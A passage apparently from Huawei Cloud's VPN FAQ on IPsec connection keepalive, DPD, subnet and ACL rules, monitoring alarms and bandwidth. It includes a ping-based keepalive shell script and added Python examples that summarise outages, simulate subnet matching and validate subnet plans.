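The log that the long-ping script above writes, analysed as an added example (not Huawei code): a Python parser that groups consecutive "is down" lines into outage windows and flags the windows long enough for the DPD settings in 6.13 to have torn the tunnel down. The sample log, the 5 s poll interval and the DPD deadline arithmetic (idle-time + retry-limit × retransmit-interval) are assumptions of this example.

```python
"""Summarise the log written by the long-ping script in 7.2 into outage
windows and flag the ones long enough for DPD to have deleted the tunnel.
Added example, not Huawei code; the sample log and the DPD deadline
arithmetic are constructed assumptions."""
from datetime import datetime, timedelta

TS_FORMAT = "%Y/%m/%d %H:%M:%S"   # timestamp format used by the 7.2 script
POLL_INTERVAL = 5                 # the script sleeps 5 s between probes
# 6.13 lists idle-time 30 s, retransmit-interval 15 s, retry-limit 3.
# Treating idle-time + retry-limit * retransmit-interval as the time after
# which the peer is declared dead is an assumption made for this example.
DPD_DEADLINE = timedelta(seconds=30 + 3 * 15)


def parse_line(line):
    """Parse 'YYYY/MM/DD HH:MM:SS - host H is ok - ...' or '... is down'.
    Returns (timestamp, host, is_ok), or None for lines that don't match."""
    try:
        stamp, rest = line.split(" - host ", 1)
        ts = datetime.strptime(stamp, TS_FORMAT)
    except ValueError:
        return None
    host, _, status = rest.partition(" is ")
    return ts, host, status.startswith("ok")


def outages(log_text, poll_interval=POLL_INTERVAL):
    """Group consecutive failed probes into windows. 'end' is the last failed
    probe plus the poll interval, i.e. the earliest the host could have been
    seen again; a window still open at the end of the log is also returned."""
    windows, current = [], None
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, ok = parsed
        end = ts + timedelta(seconds=poll_interval)
        if ok:
            if current is not None:
                windows.append(current)
                current = None
        elif current is None:
            current = {"host": host, "start": ts, "end": end, "samples": 1}
        else:
            current["end"] = end
            current["samples"] += 1
    if current is not None:
        windows.append(current)
    return windows


def dpd_risk(windows, deadline=DPD_DEADLINE):
    """Windows at least as long as the DPD deadline. A peer unreachable for
    that long would also have missed the DPD detections, so the tunnel may
    have been deleted (6.9) and needs renegotiation, not just the next ping."""
    return [w for w in windows if w["end"] - w["start"] >= deadline]


def sample_log():
    """Constructed log: a 10 s blip, an 80 s outage, then a trailing failure."""
    t0 = datetime(2021, 8, 30, 10, 0, 0)
    pattern = "oo" + "dd" + "o" + "d" * 16 + "o" + "d"
    lines = []
    for i, state in enumerate(pattern):
        stamp = (t0 + timedelta(seconds=POLL_INTERVAL * i)).strftime(TS_FORMAT)
        if state == "o":
            lines.append(f"{stamp} - host 192.168.1.10 is ok - icmp_seq=1 ttl=64 time=1.2 ms")
        else:
            lines.append(f"{stamp} - host 192.168.1.10 is down")
    return "\n".join(lines)


if __name__ == "__main__":
    found = outages(sample_log())
    for w in found:
        secs = int((w["end"] - w["start"]).total_seconds())
        print(f"{w['host']} down for {w['samples']} probes, {secs} s from {w['start']:{TS_FORMAT}}")
    print("outages that reached the DPD deadline:", len(dpd_risk(found)))
```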


7.3 How Do I Quickly Restore an Interrupted IPsec VPN Connection?

1. Trigger IPsec negotiation by private network data flows. For example, the two private networks at both ends of the VPN connection ping each other. If traffic can be properly triggered, deploy a continuous ping script. For details, see How Can I Prevent VPN Connection Interruption?.

2. If the negotiation cannot be triggered, check the Internet connectivity by pinging the VPN gateway IP address and the remote gateway IP address. By default, the HUAWEI CLOUD VPN gateway responds to ICMP packets.

3. If the Internet is normal, check whether a link switch occurs between multiple gateways. That is, the traffic for accessing the HUAWEI CLOUD gateway IP address does not flow out from the negotiated interfaces.

4. If there are no multiple ports or the port path is normal, change the PSKs at both ends of the tunnel to trigger negotiation again.

5. If the negotiation fails, check whether the negotiation policies configured at both ends are consistent and whether the interesting traffic at both ends is mutually mirrored.

6. If the negotiation policy and interesting traffic configuration are correct, reset the VPN connection status of the on-premises device. After the connection status on HUAWEI CLOUD changes to Not connected, reset the VPN connection of the on-premises device and trigger the data flow.

7. If the negotiation still cannot be triggered, perform the following operations:

a. Record the negotiation policy, PSK, local subnet, remote gateway, and remote subnet of the HUAWEI CLOUD VPN connection.

b. Use the existing gateway to create a connection. The negotiation policy, PSK, and local subnet are the same as those of the original connection. Randomly configure the remote gateway and remote subnet.

c. After the new connection is created, delete the original connection and change the remote gateway and remote subnet of the new connection to the recorded information.

d. Trigger the negotiation again.

If the IPsec tunnel status is still abnormal after you perform the preceding operations, submit a service ticket to HUAWEI CLOUD customer service for help.

7.4 What Happens If the Bandwidth of a VPN Gateway Exceeds the Size Specified When I Create the Gateway?

The bandwidth is used in the outbound direction of a VPC. If the bandwidth exceeds the size specified, network congestion will occur, some subnets cannot be accessed, or even the VPN connection will be interrupted (the VPN detection packets cannot be received).

In this case, you are advised to increase the VPN gateway bandwidth size.


NOTE

The maximum bandwidth of a VPN connection is 300 Mbit/s.

7.5 Will an IPsec VPN Connection Be Established Automatically?

After you complete the configurations on both ends of an IPsec VPN connection, the VPN connection is not established automatically. It is established only after data flows between the two ends of the connection. If no data flows between the cloud and the on-premises data center, the VPN connection will always be in the down state. Any data generated by accessing or pinging between servers can trigger the establishment of a VPN connection.

The establishment of a VPN connection can be triggered either through the gateways of the VPN connection or by the traffic between servers on the cloud and in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by a VPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPN connection can be triggered by the data flows between the two ends of the VPN connection. That is, check whether a VPN connection can be established after you ping a server on the cloud from a server in the on-premises data center, and whether a VPN connection can be established after you disconnect the connection and ping a server in the on-premises data center from a server on the cloud.

NOTE

The source and destination addresses of the ping packets must be protected by the VPN. Before a VPN connection is established, the gateway IP addresses of both ends can be pinged. However, pinging the gateway IP addresses does not trigger the establishment of the VPN connection.

7.6 Why Can't a Peer ECS Be Pinged Even When the Status of the VPN Connection Created Between the Two Regions Is Normal?

By default, a security group allows all outbound traffic. To allow inbound traffic, add inbound rules to the security group of the ECS that needs to receive ping packets and ensure that the security group allows inbound ICMP requests.

7.7 Why Can't Subnets Access Each Other When the IDC and the Cloud Are Interconnected and the VPN Connection Is Normal?

If the VPN connection status is normal, the negotiation parameters at both ends are correct. Check whether there are routes from the customer gateway to the VPN gateway egress. The VPN gateway device must have security group rules that allow mutual access between the subnets.


In addition, NAT is not required when the IDC subnet accesses the data on the cloud. Ensure that the access between the two gateway IP addresses is not blocked.

7.8 What Do I Do If a VPN Connection In Use Is Interrupted and a Message Is Displayed Indicating That Traffic Is Generated from IP Addresses Not Whitelisted?

This is usually caused by a mismatch between the ACL rules configured on the gateways of the cloud and of the customer data center.

1. Check whether the local and remote subnets of the VPN connection are matched pairs. Ensure that the ACL rules on the cloud and those of the customer data center do not conflict with each other.

2. The subnet/mask format is recommended for configuring interesting traffic in the customer data center. Do not use the address object mode, which may cause incompatibility problems.

7.9 What Do I Do If a VPN Connection Is Interrupted and a Message Is Displayed Indicating That the DPD Times Out?

This happens because the VPN connection has no access data. After the SA lifecycle ends, the VPN connection will be deleted because no response is received from the peer end after DPD is sent.

Solution

1. Enable DPD on the gateway device of the customer data center and test whether data flows at both ends can trigger connection establishment.

2. Deploy the ping shell script on the servers at both ends. You can also configure data on the gateway of the customer data center to keep the connection alive, for example, NQA on Huawei devices or IP SLA on Cisco devices.

7.10 Why Is the Status of a VPN Connection Not Connected on the Management Console When It Is Already Available?

There is a latency in displaying the latest VPN connection status on the management console.

If the service access is normal, the VPN connection is established.


7.11 Will I Be Notified If a VPN Connection Is Interrupted?

The VPN connection status can be monitored. After a VPN connection is created, the VPN service reports the connection status information to Cloud Eye, but does not automatically send alarm notifications to you. To receive notifications, create alarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPN connection and choose Operation > View Metric to view the VPN connection status.

Figure 7-1 View Metric

7.12 What Can I Do If VPN Connection Setup Fails?

1. Check the IKE and IPsec policies to see whether the negotiation modes and encryption algorithms between the local and remote sides of the VPN are the same.

a. If the IKE policy has been set up during phase one and the IPsec policy has not been enabled in phase two, the IPsec policies between the local and remote sides of the VPN may be inconsistent.

b. If a Cisco physical device is used at the customer side, it is recommended that you use MD5. Then, set Authentication Mode to MD5 in the IPsec policy for the VPN created on the cloud.

2. Check whether the ACL configurations are correct.

If the subnets of your data center are 192.168.3.0/24 and 192.168.4.0/24, and the VPC subnets are 192.168.1.0/24 and 192.168.2.0/24, configure the ACL rules for each data center subnet to allow communication with the VPC subnets. The following provides an example of ACL configurations:

   rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
   rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
   rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
   rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255

3. After the configuration is complete, ping the local and the remote side from each other to check whether the VPN connection is normal.


7.13 What Should I Do If I Cannot Access the ECSs on the Cloud from My Data Center or LAN Even If the VPN Connection Has Been Set Up?

The security group denies access from all sources by default. If you want to access your ECSs, modify the security group configuration and allow access from the remote subnets.

7.14 Why Is Not Connected Displayed as the Status for a Successfully Created VPN?

After a VPN is created, its status changes to Normal only after the servers on the two sides of the VPN communicate with each other.

● IKE v1:

If no traffic goes through the VPN for a period of time, the VPN needs to be renegotiated. The negotiation time depends on the Lifecycle (s) value in the IPsec policy. Generally, Lifecycle (s) is set to 3600 (1 hour), indicating that the negotiation will be initiated in the fifty-fourth minute. If the negotiation succeeds, the connection remains until the next round of negotiation. If the negotiation fails, the VPN status changes to Not Connected within one hour. The connection can be restored only after the two sides of the VPN communicate with each other. The disconnection can be avoided by using a network monitoring tool, such as IP SLA, to generate packets.

● IKE v2: If no traffic goes through the VPN for a period of time, the VPN remains in the connected status.

7.15 Do HUAWEI CLOUD VPNs Have the DPD Mechanism Enabled?

Yes.

HUAWEI CLOUD VPNs have the DPD mechanism enabled by default to detect the status of the IKE process in the customer data center.

After three consecutive detection failures, HUAWEI CLOUD considers that the IKE process of the customer data center is abnormal. In this case, HUAWEI CLOUD deletes the local tunnel to ensure tunnel synchronization between the two ends.

The DPD protocol does not require that the peer end be configured synchronously, but requires that the peer end can respond to DPD detections. To ensure that the tunnel status of the two ends is consistent and to avoid one end having a tunnel and the other not, it is recommended that you enable the DPD mechanism of the gateway on your side to detect the IKE process status of the VPN service on the HUAWEI CLOUD side.


NOTE

After DPD fails, the tunnel will be deleted without affecting service stability. DPD can detect exceptions of the IKE process on the peer end in time and reset the tunnel to ensure tunnel synchronization between the two ends. After a tunnel is deleted, if there is user traffic to be transmitted over the tunnel, the tunnel can be re-established through negotiation.


8 EIPs

8.1 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway is deleted.

Deleting a VPN gateway will also delete the resources associated with the gateway.

NOTICE

Deleting the last connection of a pay-per-use VPN gateway will also delete the gateway. If you want to retain the IP address, do not delete the last VPN connection.

8.2 Can an EIP Be Used as a VPN Gateway IP Address?

No.

The IP address of a VPN gateway is assigned when the VPN gateway is created and must be used together with the related configurations. An EIP does not support VPN interconnection.

8.3 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?

If a server in your data center needs to access an ECS on the cloud through a VPN, you do not need to purchase an EIP.

If the ECS needs to provide services accessible from the Internet, an EIP is required.


8.4 Why Does an ECS Have EIP Access Information After I Enable a VPN?

This occurs because the ECS had an EIP bound before the VPN was used. That is, you can access the ECS through the VPN or the EIP.

After the VPN is established, traffic from servers meeting the ACL rules can enter the tunnel to access ECSs.

● If an EIP is bound to an ECS, devices on a non-VPN network can access the ECS using the EIP.

● If the ECS should be accessible only through a VPN, unbind the EIP from the ECS after the VPN interconnection is complete. When an ECS needs an EIP bound, you can use ACL rules to specify the traffic that can access the ECS through the EIP.

NOTE

Whether a user needs to retain an EIP depends on the user's service. If an ECS is used to obtain the data of the customer data center through a VPN, and is also used to provide services accessible to Internet users, its EIP needs to be retained.

8.5 Can the Gateway of a Customer Data Center Have No Fixed Public IP Address?

No.

To connect a customer data center to HUAWEI CLOUD through a VPN, the customer data center must have a fixed public IP address or a fixed public IP address after NAT mapping.

NOTE

Common home broadband routers, personal mobile terminals, and VPN services (such as L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.


9 Route Configurations

9.1 What Is a Remote Gateway and Remote Subnet in a VPN Connection?

When creating a VPN connection, a subnet in the HUAWEI CLOUD VPC is the local subnet and the created VPN gateway is the local gateway. The connected subnet in the on-premises data center is the remote subnet, and the gateway in the on-premises data center is the remote gateway.

A remote gateway IP address is a public network IP address. A remote subnet is a subnet of the on-premises data center that needs to connect to a HUAWEI CLOUD VPC through a VPN.

9.2 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?

When a VPN connection is created, a route to reach the remote subnet is delivered automatically.

9.3 Do I Need to Add a Route to Reach the Customer Data Center Network for an ECS with Multiple NICs?

● If the primary NIC is used to establish a VPN with the customer network, no route needs to be added.

● If a non-primary NIC is used to establish a VPN with the customer network, add a route so that the non-primary NIC can reach the gateway of the customer network.


10 Subnet Setting

10.1 What Are the Precautions for Configuring the Local and Remote Subnets of a VPN Connection?

● You can configure up to 5 local subnets. The product of the number of local subnets and the number of remote subnets cannot exceed 255. If 255 is exceeded, consider supernetting the local or remote subnets.

● The local subnet cannot include the CIDR block of the remote subnet.

● There are routes pointing to the local subnet in the VPC where the VPN gateway resides.

● If there are two connections (connection A and connection B) created for a VPN gateway, and the remote subnet of connection A is within that of connection B, when the destination network to be accessed belongs to the overlapped network segment, the connection created first is matched first, regardless of the connection status. (Mask length match is not used for the policy-based VPN.)
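As an added illustration that is not from the FAQ, the following Python simulation shows the matching order described in the last item: for a policy-based VPN the first-created connection whose remote subnet contains the destination is used, even when that connection is down, whereas longest-prefix matching (shown only for contrast) would pick the more specific subnet. Connection names, subnets and statuses are constructed sample values.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class Connection:
    """One VPN connection of a gateway (constructed sample data, not console output)."""
    name: str
    remote_subnet: ipaddress.IPv4Network
    status: str  # "up" or "down"


def policy_based_match(connections, dest):
    """Selection as the FAQ describes it for a policy-based VPN: connections are
    tried in creation order and the first whose remote subnet contains the
    destination is used, regardless of its status and of how specific it is."""
    addr = ipaddress.ip_address(dest)
    for conn in connections:  # list order == creation order
        if addr in conn.remote_subnet:
            return conn
    return None


def longest_prefix_match(connections, dest):
    """Route-style selection shown only for contrast: the most specific remote
    subnet among the connections that are up wins."""
    addr = ipaddress.ip_address(dest)
    candidates = [c for c in connections if c.status == "up" and addr in c.remote_subnet]
    if not candidates:
        return None
    return max(candidates, key=lambda c: c.remote_subnet.prefixlen)


def nested_remote_subnets(connections):
    """Pairs of connections whose remote subnets nest; these are the cases where
    creation order, not mask length, decides which tunnel carries the traffic."""
    pairs = []
    for i, a in enumerate(connections):
        for b in connections[i + 1:]:
            if a.remote_subnet.subnet_of(b.remote_subnet) or b.remote_subnet.subnet_of(a.remote_subnet):
                pairs.append((a.name, b.name))
    return pairs


# Constructed sample: connection B was created first and is currently down;
# connection A was created later and its remote subnet lies inside B's.
CONNECTIONS = [
    Connection("B", ipaddress.ip_network("192.168.0.0/16"), "down"),
    Connection("A", ipaddress.ip_network("192.168.10.0/24"), "up"),
]

if __name__ == "__main__":
    dest = "192.168.10.7"
    print("nested remote subnets:", nested_remote_subnets(CONNECTIONS))
    print("policy-based match:", policy_based_match(CONNECTIONS, dest).name)      # B (down)
    print("longest-prefix match:", longest_prefix_match(CONNECTIONS, dest).name)  # A
```

Traffic for 192.168.10.7 is sent to connection B even though it is down, which is why overlapping remote subnets across connections of one gateway should be avoided.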

10.2 What Is the Limitation on the Number of Local and Remote Subnets of a VPN? Why Is an Error Message Displayed When I Update the Local Subnet by Specifying a CIDR Block?

● You can configure up to 5 local subnets. The product of the number of local subnets and the number of remote subnets cannot exceed 255.

● A VPC delivers VPC subnet routes based on the remote subnets of the VPN connection, remote subnets of a Direct Connect connection, subnets of a VPC peering connection, and subnets of a Cloud Connect connection. Each subnet has one subnet route.

● The number of VPC subnet routes cannot exceed 200. That is, in a VPC, the total number of remote subnets of the VPN connection, remote subnets of the Direct Connect connection, subnets of the VPC peering connection, subnets of the Cloud Connect connection, and custom routes cannot exceed 200.

10.3 What Do I Do If an Exception Occurs When I Add a Remote Subnet During VPN Connection Creation?

Check whether this remote subnet has been used as the destination of a VPC peering, Cloud Connect, or Direct Connect connection route, which causes routing conflicts. If yes, delete the route and create a new one.

10.4 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway is deleted.

Deleting a VPN gateway will also delete the resources associated with the gateway.

NOTICE

Deleting the last connection of a pay-per-use VPN gateway will also delete the gateway. If you want to retain the IP address, do not delete the last VPN connection.

10.5 How Do I Plan the CIDR Block of a VPC Accessed over a VPN Connection?

● The VPC CIDR block cannot overlap or conflict with the on-premises CIDR block.

● To avoid conflicts with cloud service addresses, do not use 127.0.0.0/8, 169.254.0.0/16, 224.0.0.0/3 or 100.64.0.0/10 for your on-premises network.

10.6 How Is a VPN Gateway IP Address Allocated?

The VPN gateway IP addresses of HUAWEI CLOUD are a group of IP addresses planned before the VPN gateways are purchased. These IP addresses are preset with VPN configurations.

When you buy a VPN gateway, the system randomly assigns an IP address and binds it to the VPC you selected. This IP address can be bound to only one VPC.

The IP address of the VPN gateway has preset data. Therefore, it is not interchangeable with an EIP, and you cannot specify an EIP as the VPN gateway IP address when you are buying the VPN gateway. The VPN gateway IP address can only be assigned randomly from the preset VPN IP address pool. When a VPN gateway is deleted, the binding relationship between the gateway IP address and the gateway VPC is released. When a new VPN gateway is purchased, the system randomly allocates a new gateway IP address.

11 VPN Interesting Traffic

11.1 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I Configured ACL Rules on the Gateway Device of the On-premises Data Center?

You need to create ACL rules dedicated for the gateway device of the on-premises data center, and these ACL rules will be referenced by IPsec policies.

When you configure the VPN on the cloud, the ACL rules are automatically generated based on the local and remote subnets entered on the management console and then delivered to the VPN gateway. The number of ACL rules is the number of local subnets multiplied by the number of remote subnets.

11.2 How Do I Configure and Modify the Interesting Traffic of a VPN on the Cloud?

The interesting traffic is generated when the local subnets and remote subnets communicate with each other in a full-mesh topology. For example, if there are two local subnets A and B, and three remote subnets C, D, and E, the ACL rules for the interesting traffic are as follows:

rule 1 permit ip source A destination C
rule 2 permit ip source A destination D
rule 3 permit ip source A destination E
rule 4 permit ip source B destination C
rule 5 permit ip source B destination D
rule 6 permit ip source B destination E

If you modify the local subnet and remote subnet on the management console, the interesting traffic of the VPN device is automatically updated. That is, the ACL configuration on the cloud is modified.
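As an added example (not Huawei Cloud's own code), the following Python checks a local/remote subnet plan against the limits stated in 10.1 and 10.5 (at most 5 local subnets, at most 255 local x remote pairs, no remote subnet inside a local subnet, no overlap between the two, and none of the reserved ranges on the on-premises side) and then generates the full-mesh ACL rules in the notation shown above. The subnets are constructed sample values.

```python
import ipaddress

MAX_LOCAL_SUBNETS = 5   # 10.1: at most 5 local subnets
MAX_ACL_RULES = 255     # 10.1: local subnets x remote subnets must not exceed 255

# 10.5: ranges that must not be used for the on-premises network
RESERVED = [ipaddress.ip_network(n) for n in
            ("127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/3", "100.64.0.0/10")]


def validate_subnets(local, remote):
    """Return a list of problems with a local/remote subnet plan; an empty list
    means the plan satisfies the constraints stated in 10.1 and 10.5."""
    local = [ipaddress.ip_network(s) for s in local]
    remote = [ipaddress.ip_network(s) for s in remote]
    problems = []
    if len(local) > MAX_LOCAL_SUBNETS:
        problems.append(f"{len(local)} local subnets exceed the limit of {MAX_LOCAL_SUBNETS}")
    rules = len(local) * len(remote)
    if rules > MAX_ACL_RULES:
        problems.append(f"{rules} ACL rules exceed {MAX_ACL_RULES}; supernet the local or remote subnets")
    for loc in local:
        for rem in remote:
            if rem.subnet_of(loc):
                problems.append(f"local {loc} includes remote {rem}")
            elif loc.overlaps(rem):
                problems.append(f"local {loc} overlaps remote {rem}")
    for rem in remote:
        for res in RESERVED:
            if rem.overlaps(res):
                problems.append(f"remote {rem} overlaps reserved range {res}")
    return problems


def acl_rules(local, remote):
    """Full-mesh interesting-traffic rules in the FAQ's notation: one
    'permit ip source <local> destination <remote>' rule per (local, remote) pair,
    numbered in the same order the FAQ example uses (all remotes of the first
    local subnet, then all remotes of the second, and so on)."""
    rules = []
    for loc in local:
        for rem in remote:
            rules.append(f"rule {len(rules) + 1} permit ip source {loc} destination {rem}")
    return rules


if __name__ == "__main__":
    # Constructed sample: two local (VPC) subnets and three remote (on-premises)
    # subnets, mirroring the A, B / C, D, E example in 11.2.
    local = ["192.168.1.0/24", "192.168.2.0/24"]
    remote = ["10.1.0.0/16", "10.2.0.0/16", "10.3.0.0/16"]
    print(validate_subnets(local, remote))   # [] -> plan is acceptable
    for rule in acl_rules(local, remote):    # six rules, rule 1 to rule 6
        print(rule)
    # A plan that violates 10.1 (containment) and 10.5 (reserved range)
    print(validate_subnets(["10.0.0.0/8"], ["10.1.0.0/16", "169.254.10.0/24"]))
```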


12 Keeping VPN Connection Alive

12.1 How Can I Prevent VPN Connection Interruption?

VPN connections may be renegotiated when the IPsec SA lifecycle is about to expire or the data transferred through the VPN connection exceeds 20 GB. Usually, renegotiation does not interrupt VPN connections.

Most disconnections are caused by incorrect configurations on both ends of the VPN connection, or by renegotiation failures due to Internet exceptions.

The common causes of connection interruptions are as follows:

● ACLs of the devices at the two ends of the VPN connection do not match.
● SA lifecycles at the two ends of the VPN connection do not match.
● DPD is not configured in the data center.
● The configuration is modified while the VPN is in use.
● Packets are fragmented because the data size exceeds the MTU.
● Jitter occurs on the carrier's network.

Therefore, ensure the following configurations to keep the VPN connection alive:

● Local and remote subnets are matched pairs.
● SA lifecycles at the two ends of the VPN connection are consistent.
● DPD is enabled on the gateway device of the data center, and the number of detection times is greater than or equal to 5.
● Any parameter change made during the use of the VPN connection is applied at both ends of the connection.
● TCP MAX-MSS is set to 1300 for the gateway device in the data center.
● The bandwidth of the gateway in the data center is large enough to be used by the VPN.
● VPN connection negotiation can be triggered by both ends, and the active negotiation configuration of the gateway in the data center has been enabled.


● Run a long ping on the subnets at both ends. The script content is as follows:

    #!/bin/sh
    # Long-running reachability probe: ping one host every 5 seconds and append
    # a timestamped up/down line to <host>.log.
    host=$1
    if [ -z "$host" ]; then
        echo "Usage: $(basename "$0") [HOST]"
        exit 1
    fi
    log_name="$host.log"

    while :; do
        # One probe with a 1-second timeout; grep fails when no reply arrived.
        result=$(ping -W 1 -c 1 "$host" | grep 'bytes from ')
        if [ $? -gt 0 ]; then
            echo "$(date +'%Y/%m/%d %H:%M:%S') - host $host is down" | tee -a "$log_name"
        else
            echo "$(date +'%Y/%m/%d %H:%M:%S') - host $host is ok - $(echo "$result" | cut -d ':' -f 2)" | tee -a "$log_name"
        fi
        sleep 5   # avoid flooding the link with pings
    done
    # Usage: ./ping.sh x.x.x.x >>/dev/null &

NOTE

1. Use the vi editor to copy the preceding script to the ping.sh file.
2. Run the chmod 777 ping.sh command to grant permissions to the file.
3. Run the ping command:
   ./ping.sh x.x.x.x >>/dev/null &
   x.x.x.x indicates the IP address to be pinged.
4. After the ping command is executed, the x.x.x.x.log file is generated. Run the following command:
   tail -f x.x.x.x.log
   You can view the long ping result in real time.


13 Monitoring

13.1 Which VPN Resources Can Be Monitored?

VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inbound bandwidth, outbound traffic, outbound bandwidth, and outbound bandwidth usage.

To view VPN gateway metrics, locate the target VPN gateway and click View Metric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is disconnected.

To view the VPN connection status, locate the target VPN connection and click View Metric in the Operation column.

13.2 Will I Be Notified If a VPN Connection Is Interrupted?

The VPN connection status can be monitored. After a VPN connection is created, the VPN service reports the connection status information to Cloud Eye, but does not automatically send alarm notifications to you. To receive notifications, create alarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPN connection and choose Operation > View Metric to view the VPN connection status.


Figure 13-1 View Metric

13.3 Can I View the Traffic of Each VPN Connection?

No. VPN traffic monitoring is based on the VPN gateway. You can view the inbound and outbound traffic and bandwidth of the VPN gateway, but cannot view the traffic usage of a specific VPN connection.

13.4 Will I Be Notified When the VPN Monitoring Result Is Abnormal?

Yes.

On the Simple Message Notification (SMN) and Cloud Eye consoles, you can configure notification messages to be sent when abnormal VPN monitoring results occur.

Configuring on the SMN Console

1. Log in to the management console.
   Under Management & Governance, select Simple Message Notification.


Figure 13-2 Simple Message Notification

2. Choose Topic Management > Topics and click Create Topic to create a topic, for example, VPN-huaweicloud.

Figure 13-3 Creating a topic

3. Choose Topic Management > Subscriptions and click Add Subscription.
   Select a topic, set Protocol to Email, and enter the email address for receiving the message in the Endpoint box.


Figure 13-4 Adding a subscription

NOTE

After the subscription is added, the system sends a confirmation email to your email address. Confirm the subscription in that email.

Configuring on the Cloud Eye Console

1. Log in to the management console.
   Under Management & Governance, select Cloud Eye.

Figure 13-5 Cloud Eye

2. Create an alarm rule for the bandwidth usage of the VPN gateway.
   Enter the name, select Elastic IP and Bandwidth for Resource Type, set Dimension to Bandwidths, Monitoring Scope to Specific resources and select the target VPN gateway, set Method to Create manually, and Alarm Policy to Outbound Bandwidth Usage, 5 consecutive periods, >, and 90. Set Notification Object to an SMN topic and use the default settings for other parameters.

3. Create a VPN connection status alarm rule.


   The creation process is similar to that of the bandwidth alarm rule. Select Virtual Private Network for Resource Type, set Dimension to VPN connections, Monitoring Scope to Specific resources and select the target VPN connection, set Method to Create manually, and Alarm Policy to VPN Connection Status, <, and 1. Set Notification Object to an SMN topic and use the default settings for other parameters.

4. Create an alarm rule for monitoring IDC links.
   Create a website monitoring task, set Type to PING, URL to the gateway IP address of the customer data center, and retain the default settings for other parameters. Create an alarm rule, select Website Monitoring for Resource Type, set Monitoring Scope to Specific resources and select the target website monitoring task, set Method to Create manually, and Alarm Policy to Available Monitoring Location Count, and configure other parameters as required. Set Notification Object to an SMN topic and use the default settings for other parameters.

Figure 13-6 Creating an alarm rule


14 Bandwidth and Network Speed

14.1 What Is the Actual VPN Connection Network Speed?

Assume that a VPN connection has been created, and that two ECSs have been created, one on the local side and the other on the remote side. The two ECSs can ping each other.

Perform the following steps to test the VPN gateway network speed if the bandwidth of your VPN gateway is 200 Mbit/s:

1. If the ECSs at the two sides of the VPN run Windows, use iPerf3 and FileZilla (a free FTP application for file uploading and downloading) to test the network speed.

NOTE

The test shows that the average VPN network speed is 180 Mbit/s, that is, a network speed deviation of about 10%. The TCP and FTP protocols have a congestion control mechanism, and the IPsec protocol adds a new IP header. Therefore, a network speed deviation of about 10% is normal for the VPN network.

Figure 14-1 shows the result of the test performed using the iPerf3 client.

Figure 14-1 Test result for 200 Mbit/s bandwidth (iPerf3 client)


Figure 14-2 shows the result of the test performed using the iPerf3 server.

Figure 14-2 Test result for 200 Mbit/s bandwidth (iPerf3 server)

2. If the ECSs at the two sides of the VPN run CentOS 7, use iPerf3 to test the network speed. The network speed can reach 180 Mbit/s.

3. If the ECS functioning as the server runs CentOS 7 and the ECS functioning as the client runs Windows, use iPerf3 and FileZilla to test the network speed. The network speed is about 20 Mbit/s. The reason is that the TCP implementations on Windows and Linux differ, which slows the network speed. Therefore, if the ECSs at the two sides of the VPN use different OSs, the VPN network speed does not meet the bandwidth requirements. Figure 14-3 shows the result of the test performed using iPerf3.

Figure 14-3 Test result when ECSs at the two sides run different OSs (iPerf3)

Perform the following steps to test the VPN gateway network speed if the bandwidth of your VPN gateway is 1,000 Mbit/s:

The VPN gateway bandwidth is shared by all of its VPN connections. If the bandwidth size is large, multiple ECSs are required to test the VPN gateway bandwidth because the forwarding performance of each ECS is limited. This scenario has high requirements on ECS specifications. The ECSs used for testing must have NICs that support a bandwidth of 2 Gbit/s or higher.


The tests show that the actual VPN connection network speed on HUAWEI CLOUD is within the normal range. However, the servers used at both sides of the VPN connection must run the same type of OS, and the server NICs must meet the configuration requirements.

14.2 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?

Your purchased VPN gateway bandwidth is used in the outbound direction. To balance the traffic in the inbound and outbound directions, the bandwidth in the inbound direction is limited.

● If the purchased bandwidth is less than or equal to 10 Mbit/s, the bandwidth in the inbound direction is limited to 10 Mbit/s.

● If the purchased bandwidth is more than 10 Mbit/s, the bandwidth in the inbound direction is the same as the purchased bandwidth.

The unit of bandwidth is Mbit/s and that of traffic is GB.

14.3 How Do I Change the VPN Bandwidth Size?

1. On the VPN Gateways page, locate the row that contains the target VPN gateway and choose More > Modify Bandwidth in the Operation column.
2. On the Modify Bandwidth page, select your required bandwidth size.
3. Click Submit.

14.4 What Happens If the Bandwidth of a VPN Gateway Exceeds the Size Specified When I Create the Gateway?

The bandwidth is used in the outbound direction of a VPC. If the traffic exceeds the specified bandwidth, network congestion occurs, some subnets cannot be accessed, or the VPN connection may even be interrupted because the VPN detection packets cannot be received.

In this case, you are advised to increase the VPN gateway bandwidth size.

NOTE

The maximum bandwidth of a VPN connection is 300 Mbit/s.

14.5 Why Does the VPN Bandwidth Change Not Take Effect?

A VPN bandwidth change takes some time to take effect.

Test the bandwidth 5 minutes after you change it.


NOTE

Changing the VPN bandwidth will not interrupt running workloads or networks.

14.6 Can a VPN Share Bandwidth with an EIP?

No.

Currently, a public IP address is automatically generated and its bandwidth is set when you create a VPN gateway. The VPN cannot share bandwidth with an EIP.

14.7 What Are the Differences Between the Bandwidth of a VPN Connection and That of a Direct Connect Connection?

Concepts

● The bandwidth of a Direct Connect connection is the bandwidth of the physical connection created by a user.
